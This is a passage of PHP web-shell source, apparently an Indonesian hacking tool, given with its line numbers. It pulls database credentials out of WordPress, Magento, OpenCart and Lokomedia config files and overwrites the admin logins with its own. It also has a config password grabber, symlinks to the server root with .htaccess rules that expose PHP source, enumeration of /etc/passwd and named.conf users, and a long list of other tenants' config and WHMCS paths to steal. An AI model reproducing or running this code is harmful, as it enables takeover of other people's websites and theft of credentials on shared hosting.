  1228. $dbprefix = ambilkata($config, "table_prefix = '", "'");
  1229. $prefix = $dbprefix . "users";
  1230. $option = $dbprefix . "options";
  1231. $conn = mysql_connect($dbhost, $dbuser, $dbpass);
  1232. $db = mysql_select_db($dbname);
  1233. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1234. $result = mysql_fetch_array($q);
  1235. $id = $result[ID];
  1236. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1237. $result2 = mysql_fetch_array($q2);
  1238. $target = $result2[option_value];
  1239. if ($target == '') {
  1240. $url_target = "<font color=red>DOMAIN ERROR</font>";
  1241. } else {
  1242. $url_target = "<a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a>";
  1243. }
  1244. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  1245. echo "<tr><td>Wordpress</td>";
  1246. //echo "[ ".$file_conf." ]<br>";
  1247. //echo $url_target;
  1248. if (!$update or !$conn or !$db) {
  1249. echo "<td><font color=red>" . mysql_error() . "</font></td><td>!</td><td>!</td><td>" . $file_conf . "</td>";
  1250. } else {
  1251. echo "<td><font color=lime>$user</font></td>";
  1252. echo "<td><font color=lime>$pass</font></td>";
  1253. echo "<td>$url_target</td>";
  1254. echo "<td>" . $file_conf . "</td>";
  1255. }
  1256. echo "</tr>";
  1257. mysql_close($conn);
  1258. } elseif (preg_match("/Magento|Mage_Core/", $config)) {
  1259. $dbhost = ambilkata($config, "<host><![CDATA[", "]]></host>");
  1260. $dbuser = ambilkata($config, "<username><![CDATA[", "]]></username>");
  1261. $dbpass = ambilkata($config, "<password><![CDATA[", "]]></password>");
  1262. $dbname = ambilkata($config, "<dbname><![CDATA[", "]]></dbname>");
  1263. $dbprefix = ambilkata($config, "<table_prefix><![CDATA[", "]]></table_prefix>");
  1264. $prefix = $dbprefix . "admin_user";
  1265. $option = $dbprefix . "core_config_data";
  1266. $conn = mysql_connect($dbhost, $dbuser, $dbpass);
  1267. $db = mysql_select_db($dbname);
  1268. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1269. $result = mysql_fetch_array($q);
  1270. $id = $result[user_id];
  1271. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1272. $result2 = mysql_fetch_array($q2);
  1273. $target = $result2[value];
  1274. if ($target == '') {
  1275. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1276. } else {
  1277. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1278. }
  1279. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1280. echo "[ " . $file_conf . " ]<br>";
  1281. echo "CMS => Magento<br>";
  1282. echo $url_target;
  1283. if (!$update or !$conn or !$db) {
  1284. echo "[-] <font color=red>" . mysql_error() . "</font><br><br>";
  1285. } else {
  1286. echo "[+] username: <font color=lime>$user</font><br>";
  1287. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1288. }
  1289. mysql_close($conn);
  1290. } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
  1291. $dbhost = ambilkata($config, "'DB_HOSTNAME', '", "'");
  1292. $dbuser = ambilkata($config, "'DB_USERNAME', '", "'");
  1293. $dbpass = ambilkata($config, "'DB_PASSWORD', '", "'");
  1294. $dbname = ambilkata($config, "'DB_DATABASE', '", "'");
  1295. $dbprefix = ambilkata($config, "'DB_PREFIX', '", "'");
  1296. $prefix = $dbprefix . "user";
  1297. $conn = mysql_connect($dbhost, $dbuser, $dbpass);
  1298. $db = mysql_select_db($dbname);
  1299. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1300. $result = mysql_fetch_array($q);
  1301. $id = $result[user_id];
  1302. $target = ambilkata($config, "HTTP_SERVER', '", "'");
  1303. if ($target == '') {
  1304. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1305. } else {
  1306. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1307. }
  1308. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1309. echo "[ " . $file_conf . " ]<br>";
  1310. echo "CMS => OpenCart<br>";
  1311. echo $url_target;
  1312. if (!$update or !$conn or !$db) {
  1313. echo "[-] <font color=red>" . mysql_error() . "</font><br><br>";
  1314. } else {
  1315. echo "[+] username: <font color=lime>$user</font><br>";
  1316. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1317. }
  1318. mysql_close($conn);
  1319. } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
  1320. $dbhost = ambilkata($config, 'server = "', '"');
  1321. $dbuser = ambilkata($config, 'username = "', '"');
  1322. $dbpass = ambilkata($config, 'password = "', '"');
  1323. $dbname = ambilkata($config, 'database = "', '"');
  1324. $prefix = "users";
  1325. $option = "identitas";
  1326. $conn = mysql_connect($dbhost, $dbuser, $dbpass);
  1327. $db = mysql_select_db($dbname);
  1328. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1329. $result = mysql_fetch_array($q);
  1330. $target = $result[alamat_website];
  1331. if ($target == '') {
  1332. $target2 = $result[url];
  1333. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1334. if ($target2 == '') {
  1335. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1336. } else {
  1337. $cek_login3 = file_get_contents("$target2/adminweb/");
  1338. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1339. if (preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1340. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1341. } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1342. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1343. } else {
  1344. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1345. }
  1346. }
  1347. } else {
  1348. $cek_login = file_get_contents("$target/adminweb/");
  1349. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1350. if (preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1351. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1352. } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1353. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1354. } else {
  1355. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1356. }
  1357. }
  1358. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  1359. echo "[ " . $file_conf . " ]<br>";
  1360. echo "CMS => Lokomedia<br>";
  1361. if (preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1362. echo $url_target2;
  1363. } else {
  1364. echo $url_target;
  1365. }
  1366. if (!$update or !$conn or !$db) {
  1367. echo "[-] <font color=red>" . mysql_error() . "</font><br><br>";
  1368. } else {
  1369. echo "[+] username: <font color=lime>$user</font><br>";
  1370. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1371. }
  1372. mysql_close($conn);
  1373. }
  1374. }
  1375. }
  1376. } elseif (isset($_GET['do']) && ($_GET['do'] == 'grabpass')) {
  1377. if ($_POST['gass']) {
  1378. echo "<center><h1>Config Password Grabber</h1>
  1379. <form method='post'>
  1380. Link Config: <br>
  1381. <textarea name='link' style='width: 450px; height:250px;'>";
  1382. UrlLoop($_POST['linkconf'], 'txt');
  1383. echo "</textarea><br>
  1384. <input type='submit' style='width: 450px;' name='grabpass' value='Hajar!!'>
  1385. </form></center>";
  1386. } else {
  1387. echo "<center><h1>Config Password Grabber</h1>
  1388. <form method='post'>
  1389. Link Config: <br>
  1390. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/0xsym/'><br>
  1391. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1392. </form></center>";
  1393. }
  1394. if ($_POST['grabpass']) {
  1395.  
  1396. $link = explode("\r\n", $_POST['link']);
  1397. echo '<textarea>';
  1398. foreach ($link as $dir_config) {
  1399. $ambilpass = ambil_password($dir_config);
  1400. $hh = @file_get_contents("password.txt");
  1401. @file_put_contents("password.txt", $hh . $ambilpass);
  1402.  
  1403. echo $ambilpass;
  1404.  
  1405. }
  1406. echo '</textarea>';
  1407. }
  1408. } elseif (isset($_GET['do']) && ($_GET['do'] == 'symlink')) {
  1409. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1410. $d0mains = @file("/etc/named.conf");
  1411. if ($d0mains) {
  1412. @mkdir("0xsymlink", 0777);
  1413. @chdir("0xsymlink");
  1414. @exe("ln -s / root");
  1415. $file3 = 'Options Indexes FollowSymLinks
  1416. DirectoryIndex jancox.htm
  1417. AddType text/plain .php
  1418. AddHandler text/plain .php
  1419. Satisfy Any';
  1420. $fp3 = fopen('.htaccess', 'w');
  1421. $fw3 = fwrite($fp3, $file3);
  1422. @fclose($fp3);
  1423. echo "
  1424. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1425. <tr>
  1426. <td align=center><font size=2>S. No.</font></td>
  1427. <td align=center><font size=2>Domains</font></td>
  1428. <td align=center><font size=2>Users</font></td>
  1429. <td align=center><font size=2>Symlink</font></td>
  1430. </tr>";
  1431. $dcount = 1;
  1432. foreach ($d0mains as $d0main) {
  1433. if (eregi("zone", $d0main)) {
  1434. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1435. flush();
  1436. if (strlen(trim($domains[1][0])) > 2) {
  1437. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
  1438. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1439. <td align=left><a href=http://www." . $domains[1][0] . "/><font class=txt>" . $domains[1][0] . "</font></a></td>
  1440. <td>" . $user['name'] . "</td>
  1441. <td><a href='$full/0xsymlink/root/home/" . $user['name'] . "/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1442. flush();
  1443. $dcount++;}}}
  1444. echo "</table>";
  1445. } else {
  1446. $TEST = $etcpasswd;
  1447. if ($TEST) {
  1448. @mkdir("0xsymlink", 0777);
  1449. @chdir("0xsymlink");
  1450. exe("ln -s / root");
  1451. $file3 = 'Options Indexes FollowSymLinks
  1452. DirectoryIndex jancox.htm
  1453. AddType text/plain .php
  1454. AddHandler text/plain .php
  1455. Satisfy Any';
  1456. $fp3 = fopen('.htaccess', 'w');
  1457. $fw3 = fwrite($fp3, $file3);
  1458. @fclose($fp3);
  1459. echo "
  1460. <table align=center border=1><tr>
  1461. <td align=center>S. No.</td>
  1462. <td align=center>Users</td>
  1463. <td align=center>Symlink</td></tr>";
  1464. $dcount = 1;
  1465. $file = $etcpasswd;
  1466. preg_match_all('/(.*?):x:/', $file, $file);
  1467. foreach ($file[1] as $matches) {
  1468. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1469. <td align=center><font class=txt>" . $matches . "</td>";
  1470. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1471. $dcount++;
  1472. }
  1473. echo "</table>";
  1474. } else {
  1475.  
  1476. if ($os != "Windows") {
  1477. @mkdir("0xsymlink", 0777);
  1478. @chdir("0xsymlink");
  1479. @exe("ln -s / root");
  1480. $file3 = '
  1481. Options Indexes FollowSymLinks
  1482. DirectoryIndex jancox.htm
  1483. AddType text/plain .php
  1484. AddHandler text/plain .php
  1485. Satisfy Any
  1486. ';
  1487. $fp3 = fopen('.htaccess', 'w');
  1488. $fw3 = fwrite($fp3, $file3);@fclose($fp3);
  1489. echo "
  1490. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1491. <table align=center border=1><tr>
  1492. <td align=center><font size=3>ID</font></td>
  1493. <td align=center><font size=3>Users</font></td>
  1494. <td align=center><font size=3>Symlink</font></td></tr>";
  1495. $temp = "";
  1496. $val1 = 0;
  1497. $val2 = 1000;
  1498. for (; $val1 <= $val2; $val1++) {
  1499. $uid = @posix_getpwuid($val1);
  1500. if ($uid) {
  1501. $temp .= join(':', $uid) . "\n";
  1502. }
  1503. }
  1504. echo '<br/>';
  1505. $temp = trim($temp);
  1506. $file5 =
  1507. fopen("test.txt", "w");
  1508. fputs($file5, $temp);
  1509. fclose($file5);
  1510. $dcount = 1;
  1511. $file =
  1512. fopen("test.txt", "r") or exit("Unable to open file!");
  1513. while (!feof($file)) {
  1514. $s = fgets($file);
  1515. $matches = array();
  1516. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1517. $matches = str_replace("home/", "", $matches[1]);
  1518. if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
  1519. continue;
  1520. }
  1521.  
  1522. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1523. <td align=center><font class=txt>" . $matches . "</td>";
  1524. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1525. $dcount++;}
  1526. fclose($file);
  1527. echo "</table></div></center>";
  1528. unlink("test.txt");
  1529. } else {
  1530. echo "<center><font size=3>Cannot create Symlink</font></center>";
  1531. }
  1532.  
  1533. }
  1534. }
  1535. } elseif (isset($_GET['do']) && ($_GET['do'] == 'config')) {
  1536. if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
  1537. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1538. exit;
  1539. }
  1540. if ($_POST) {
  1541. if ($_POST['tipe'] == 'grabsymv') {
  1542. @mkdir("0xsymv", 0777);
  1543. exe("ln -s / 0xsymv/root");
  1544. $htaccess = "Options Indexes FollowSymLinks
  1545. DirectoryIndex jancox.htm
  1546. AddType text/plain .php
  1547. AddHandler text/plain .php
  1548. Satisfy Any";
  1549. @file_put_contents("0xsymv/.htaccess", $htaccess);
  1550. $etc_passwd = $_POST['passwd'];
  1551.  
  1552. $etc_passwd = explode("\n", $etc_passwd);
  1553. foreach ($etc_passwd as $passwd) {
  1554. $pawd = explode(":", $passwd);
  1555. $user = $pawd[5];
  1556. $usera = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1557. if (preg_match('/vhosts/i', $user)) {
  1558. exe("ln -s " . $user . "/httpdocs/wp-config.php 0xsymv/" . $usera . "-Wordpress.txt");
  1559. exe("ln -s " . $user . "/httpdocs/configuration.php 0xsymv/" . $usera . "-Joomla.txt");
  1560. exe("ln -s " . $user . "/httpdocs/config/koneksi.php 0xsymv/" . $usera . "-Lokomedia.txt");
  1561. exe("ln -s " . $user . "/httpdocs/forum/config.php 0xsymv/" . $usera . "-phpBB.txt");
  1562. exe("ln -s " . $user . "/httpdocs/sites/default/settings.php 0xsymv/" . $usera . "-Drupal.txt");
  1563. exe("ln -s " . $user . "/httpdocs/config/settings.inc.php 0xsymv/" . $usera . "-PrestaShop.txt");
  1564. exe("ln -s " . $user . "/httpdocs/app/etc/local.xml 0xsymv/" . $usera . "-Magento.txt");
  1565. exe("ln -s " . $user . "/httpdocs/admin/config.php 0xsymv/" . $usera . "-OpenCart.txt");
  1566. exe("ln -s " . $user . "/httpdocs/application/config/database.php 0xsymv/" . $usera . "-Ellislab.txt");
  1567. }}}
  1568. if ($_POST['tipe'] == 'grabsym') {
  1569. @mkdir("0xsym", 0777);
  1570. @symlink("/", "0xsym/root");
  1571. $htaccess = "Options Indexes FollowSymLinks
  1572. DirectoryIndex jancox.htm
  1573. AddType text/plain .php
  1574. AddHandler text/plain .php
  1575. Satisfy Any";
  1576. @file_put_contents("0xsym/.htaccess", $htaccess);}
  1577. if ($_POST['tipe'] == 'grabsym404') {
  1578. @mkdir("0xsym404", 0777);
  1579. @symlink("/", "0xsym404/root");
  1580. $htaccess = "Options Indexes FollowSymLinks
  1581. DirectoryIndex jancox.htm
  1582. AddType text/plain .php
  1583. AddHandler text/plain .php
  1584. Satisfy Any
  1585. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  1586. AddIcon 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAFUSURBVDiNpZK9SgNBFIXPvXNndjcRopX4U4kWVr5AChU7H8BSfItAHkB9CXsrW0GwEQtRwVKMRtAU8ZcYWaNmM2OxqyyiYZdcGIaZ4Z77MeeQcw6DFA/UDUAAYHHj8hOATj9oRSe2Z1f2KjP1fgLknMPS5lW0Vi4pZopvHXDW+IhOr99gXTzkr9qvTBMtrNd8AsLVcomZKDP61kELihGIJ9QBgO2jdsIE/Jb5OacGFAwDQEeMEOZnh1EqMChtSB8a64BW2MNh7QVihCGKcNHswmZ0lAkYHxF4QhBPCKIYRU9l605KmGCEIUYztCYMBfkEjGZ4OiHwRQF+vkQG+ptACIFREJVPQAvFf+BrjoyQ+CZfqq118DRFEhjebbbel6dGiyTqf+vSrkaRQ/0utL7mHXl9vq+eP3Unbh/H5gDKiOF67YebY0dSJcRBm0z2rFl2yWp8AVDIW32da7pLAAAAAElFTkSuQmCC' ^^DIRECTORY^^
  1587. DefaultIcon 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='
  1588. IndexIgnore *.txt404
  1589. IndexStyleSheet 'https://0x1999.github.io/0xShell/style/melex.css'
  1590. RewriteEngine On
  1591. RewriteCond %{REQUEST_FILENAME} ^.*0xsym404 [NC]
  1592. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  1593. @file_put_contents("0xsym404/.htaccess", $htaccess);
  1594. }
  1595. if ($_POST['tipe'] == 'grab') {
  1596. mkdir("0xgrab", 0777);
  1597. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1598. $htc = fopen("0xgrab/.htaccess", "w");
  1599. fwrite($htc, $isi_htc);
  1600. }
  1601. $passwd = $_POST['passwd'];
  1602.  
  1603. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1604. foreach ($user_config[1] as $user_cox) {
  1605. $grab_config = array(
  1606. "/home/$user_cox/.accesshash" => "WHM-accesshash",
  1607. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1608. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  1609. "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  1610. "/home/$user_cox/public_html/config/settings.inc.php" => "Shop",
  1611. "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  1612. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  1613. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
  1614. "/home/$user_cox/public_html/vb/includes/config.php" => "Vbulletin",
  1615. "/home/$user_cox/public_html/includes/config.php" => "Vbulletin",
  1616. "/home/$user_cox/public_html/forum/includes/config.php" => "Vbulletin",
  1617. "/home/$user_cox/public_html/forums/includes/config.php" => "Vbulletin",
  1618. "/home/$user_cox/public_html/cc/includes/config.php" => "Vbulletin",
  1619. "/home/$user_cox/public_html/inc/config.php" => "MyBB",
  1620. "/home/$user_cox/public_html/includes/configure.php" => "OsCommerce",
  1621. "/home/$user_cox/public_html/shop/includes/configure.php" => "OsCommerce",
  1622. "/home/$user_cox/public_html/os/includes/configure.php" => "OsCommerce",
  1623. "/home/$user_cox/public_html/oscom/includes/configure.php" => "OsCommerce",
  1624. "/home/$user_cox/public_html/products/includes/configure.php" => "OsCommerce",
  1625. "/home/$user_cox/public_html/cart/includes/configure.php" => "OsCommerce",
  1626. "/home/$user_cox/public_html/inc/conf_global.php" => "IPB",
  1627. "/home/$user_cox/public_html/wp-config.php" => "Wordpress",
  1628. "/home/$user_cox/public_html/wp/test/wp-config.php" => "Wordpress",
  1629. "/home/$user_cox/public_html/blog/wp-config.php" => "Wordpress",
  1630. "/home/$user_cox/public_html/beta/wp-config.php" => "Wordpress",
  1631. "/home/$user_cox/public_html/portal/wp-config.php" => "Wordpress",
  1632. "/home/$user_cox/public_html/site/wp-config.php" => "Wordpress",
  1633. "/home/$user_cox/public_html/wp/wp-config.php" => "Wordpress",
  1634. "/home/$user_cox/public_html/WP/wp-config.php" => "Wordpress",
  1635. "/home/$user_cox/public_html/news/wp-config.php" => "Wordpress",
  1636. "/home/$user_cox/public_html/wordpress/wp-config.php" => "Wordpress",
  1637. "/home/$user_cox/public_html/test/wp-config.php" => "Wordpress",
  1638. "/home/$user_cox/public_html/demo/wp-config.php" => "Wordpress",
  1639. "/home/$user_cox/public_html/home/wp-config.php" => "Wordpress",
  1640. "/home/$user_cox/public_html/v1/wp-config.php" => "Wordpress",
  1641. "/home/$user_cox/public_html/v2/wp-config.php" => "Wordpress",
  1642. "/home/$user_cox/public_html/press/wp-config.php" => "Wordpress",
  1643. "/home/$user_cox/public_html/new/wp-config.php" => "Wordpress",
  1644. "/home/$user_cox/public_html/blogs/wp-config.php" => "Wordpress",
  1645. "/home/$user_cox/public_html/configuration.php" => "Joomla",
  1646. "/home/$user_cox/public_html/blog/configuration.php" => "Joomla",
  1647. "/home/$user_cox/public_html/submitticket.php" => "^WHMCS",
  1648. "/home/$user_cox/public_html/cms/configuration.php" => "Joomla",
  1649. "/home/$user_cox/public_html/beta/configuration.php" => "Joomla",
  1650. "/home/$user_cox/public_html/portal/configuration.php" => "Joomla",
  1651. "/home/$user_cox/public_html/site/configuration.php" => "Joomla",
  1652. "/home/$user_cox/public_html/main/configuration.php" => "Joomla",
  1653. "/home/$user_cox/public_html/home/configuration.php" => "Joomla",
  1654. "/home/$user_cox/public_html/demo/configuration.php" => "Joomla",
  1655. "/home/$user_cox/public_html/test/configuration.php" => "Joomla",
  1656. "/home/$user_cox/public_html/v1/configuration.php" => "Joomla",
  1657. "/home/$user_cox/public_html/v2/configuration.php" => "Joomla",
  1658. "/home/$user_cox/public_html/joomla/configuration.php" => "Joomla",
  1659. "/home/$user_cox/public_html/new/configuration.php" => "Joomla",
  1660. "/home/$user_cox/public_html/WHMCS/submitticket.php" => "WHMCS",
  1661. "/home/$user_cox/public_html/whmcs1/submitticket.php" => "WHMCS",
  1662. "/home/$user_cox/public_html/Whmcs/submitticket.php" => "WHMCS",
  1663. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
  1664. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
  1665. "/home/$user_cox/public_html/WHMC/submitticket.php" => "WHMCS",
  1666. "/home/$user_cox/public_html/Whmc/submitticket.php" => "WHMCS",
  1667. "/home/$user_cox/public_html/whmc/submitticket.php" => "WHMCS",
  1668. "/home/$user_cox/public_html/WHM/submitticket.php" => "WHMCS",
  1669. "/home/$user_cox/public_html/Whm/submitticket.php" => "WHMCS",
  1670. "/home/$user_cox/public_html/whm/submitticket.php" => "WHMCS",
  1671. "/home/$user_cox/public_html/HOST/submitticket.php" => "WHMCS",
  1672. "/home/$user_cox/public_html/Host/submitticket.php" => "WHMCS",
  1673. "/home/$user_cox/public_html/host/submitticket.php" => "WHMCS",
  1674. "/home/$user_cox/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1675. "/home/$user_cox/public_html/Supportes/submitticket.php" => "WHMCS",
  1676. "/home/$user_cox/public_html/supportes/submitticket.php" => "WHMCS",
  1677. "/home/$user_cox/public_html/domains/submitticket.php" => "WHMCS",
  1678. "/home/$user_cox/public_html/domain/submitticket.php" => "WHMCS",
  1679. "/home/$user_cox/public_html/Hosting/submitticket.php" => "WHMCS",
  1680. "/home/$user_cox/public_html/HOSTING/submitticket.php" => "WHMCS",
  1681. "/home/$user_cox/public_html/hosting/submitticket.php" => "WHMCS",
  1682. "/home/$user_cox/public_html/CART/submitticket.php" => "WHMCS",
  1683. "/home/$user_cox/public_html/Cart/submitticket.php" => "WHMCS",
  1684. "/home/$user_cox/public_html/cart/submitticket.php" => "WHMCS",
  1685. "/home/$user_cox/public_html/ORDER/submitticket.php" => "WHMCS",
  1686. "/home/$user_cox/public_html/Order/submitticket.php" => "WHMCS",
  1687. "/home/$user_cox/public_html/order/submitticket.php" => "WHMCS",
  1688. "/home/$user_cox/public_html/CLIENT/submitticket.php" => "WHMCS",
  1689. "/home/$user_cox/public_html/Client/submitticket.php" => "WHMCS",
  1690. "/home/$user_cox/public_html/client/submitticket.php" => "WHMCS",
  1691. "/home/$user_cox/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1692. "/home/$user_cox/public_html/Clientarea/submitticket.php" => "WHMCS",
  1693. "/home/$user_cox/public_html/clientarea/submitticket.php" => "WHMCS",
  1694. "/home/$user_cox/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1695. "/home/$user_cox/public_html/Support/submitticket.php" => "WHMCS",
  1696. "/home/$user_cox/public_html/support/submitticket.php" => "WHMCS",
  1697. "/home/$user_cox/public_html/BILLING/submitticket.php" => "WHMCS",
  1698. "/home/$user_cox/public_html/Billing/submitticket.php" => "WHMCS",
  1699. "/home/$user_cox/public_html/billing/submitticket.php" => "WHMCS",
  1700. "/home/$user_cox/public_html/BUY/submitticket.php" => "WHMCS",
  1701. "/home/$user_cox/public_html/Buy/submitticket.php" => "WHMCS",
  1702. "/home/$user_cox/public_html/buy/submitticket.php" => "WHMCS",
  1703. "/home/$user_cox/public_html/MANAGE/submitticket.php" => "WHMCS",
  1704. "/home/$user_cox/public_html/Manage/submitticket.php" => "WHMCS",
  1705. "/home/$user_cox/public_html/manage/submitticket.php" => "WHMCS",
  1706. "/home/$user_cox/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1707. "/home/$user_cox/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1708. "/home/$user_cox/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1709. "/home/$user_cox/public_html/clientsupport/submitticket.php" => "WHMCS",
  1710. "/home/$user_cox/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1711. "/home/$user_cox/public_html/Checkout/submitticket.php" => "WHMCS",
  1712. "/home/$user_cox/public_html/checkout/submitticket.php" => "WHMCS",
  1713. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1714. "/home/$user_cox/public_html/Billings/submitticket.php" => "WHMCS",
  1715. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
  1716. "/home/$user_cox/public_html/BASKET/submitticket.php" => "WHMCS",
  1717. "/home/$user_cox/public_html/Basket/submitticket.php" => "WHMCS",
  1718. "/home/$user_cox/public_html/basket/submitticket.php" => "WHMCS",
  1719. "/home/$user_cox/public_html/SECURE/submitticket.php" => "WHMCS",
  1720. "/home/$user_cox/public_html/Secure/submitticket.php" => "WHMCS",
  1721. "/home/$user_cox/public_html/secure/submitticket.php" => "WHMCS",
  1722. "/home/$user_cox/public_html/SALES/submitticket.php" => "WHMCS",
  1723. "/home/$user_cox/public_html/Sales/submitticket.php" => "WHMCS",
  1724. "/home/$user_cox/public_html/sales/submitticket.php" => "WHMCS",
  1725. "/home/$user_cox/public_html/BILL/submitticket.php" => "WHMCS",
  1726. "/home/$user_cox/public_html/Bill/submitticket.php" => "WHMCS",
  1727. "/home/$user_cox/public_html/bill/submitticket.php" => "WHMCS",
  1728. "/home/$user_cox/public_html/PURCHASE/submitticket.php" => "WHMCS",
